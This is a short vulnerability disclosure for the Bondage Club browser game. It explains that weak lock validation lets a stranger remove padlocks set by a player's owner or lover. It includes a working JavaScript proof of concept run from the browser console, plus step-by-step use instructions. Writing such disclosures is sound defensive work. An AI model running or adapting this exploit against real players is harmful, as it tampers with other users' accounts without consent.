Cause:
Failure of validation mechanisms
Where:
https://gitgud.io/BondageProjects/Bondage-College/-/blob/master/BondageClub/Scripts/Validation.js#L369
https://gitgud.io/BondageProjects/Bondage-College/-/blob/master/BondageClub/Scripts/Inventory.js#L1295
https://gitgud.io/BondageProjects/Bondage-College/-/blob/master/BondageClub/Scripts/Validation.js#L792
Effect:
Locks(owners, lovers) can be removed by strangers
Why:
The InventoryGetLock doesn't check 'lock' effect. So if you removed the effect only, newLock will still be True.
So this modify is undetected by ValidationResolveLockModification.
This will ultimately lead into ValidationSanitizeLock being triggered and lock removed by receptient.
Since it removes lock without lock effect.
PoC:
targetName = prompt("targetMember name", "awaqwq");
targetMember = Character.find(kamrynn => kamrynn.Name.toLowerCase() == targetName);
if (targetMember == null) {
return;
}
targetMember.Appearance.forEach(sador => {
if (sador.Difficulty > 0) {
if (sador.Property != null) {
if (sador.Property.Effect != null) {
if (sador.Property.Effect.indexOf("Lock") >= 0) {
for (var erene = 0; erene < sador.Property.Effect.length; erene++) {
sador.Property.Effect[erene] == "Lock" && (sador.Property.Effect.splice(erene, 1), erene--);
}
}
}
}
}
});
targetMember.ArousalSettings.Progress = 0;
ChatRoomCharacterUpdate(targetMember);How to:
Alice is the owner of Bob, while Oscar has no relationship with Alice and Bob at all
Now suppose Bob has some toy locked by a owner's padlock of Alice
Oscar enters the room, presses F12, enters the PoC mentioned above, and type 'bob' in the prompt
Those toy will be unlocked immediately
Known affected version:
EVERY VERSION
Who am I:
A community cybersecurity consultant from CN
I'd like to be reffered to as:
awaqwq(huzpsb)
DO NOT DISCLOSE THIS IN GAME, NOT AT LEAST BEFORE THIS PATCH IS MERGED.
COMMENT HERE INSTEAD OF THE GITGUD IF YOU WANT TO DRAW MY QUICK ATTENTION.